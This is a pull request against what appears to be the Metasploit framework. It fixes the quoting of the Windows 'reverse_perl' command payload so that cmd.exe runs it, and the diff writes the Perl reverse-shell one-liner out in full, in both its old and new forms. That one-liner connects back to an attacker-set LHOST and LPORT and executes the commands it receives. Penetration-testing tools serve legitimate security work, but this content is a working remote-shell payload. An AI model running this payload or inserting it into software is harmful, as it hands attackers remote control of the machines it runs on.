### PR TITLE
Fix for cmd/windows/reverse_perl payload

### DIFF
--- a/modules/payloads/singles/cmd/windows/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb
@@ -48,7 +48,7 @@ module Metasploit3
 		lhost = datastore['LHOST']
 		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
 		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-		cmd   = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+		cmd   = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
 	end
 
 end


### PR DESCRIPTION
Attempt to fix the payload.

cmd.exe fails to execute the default command due to incorrect use of quotes. This is an attempt to fix it.
Changed surrounding quotes (') to double quotes (") and escaped backslashes (\ -> \\).
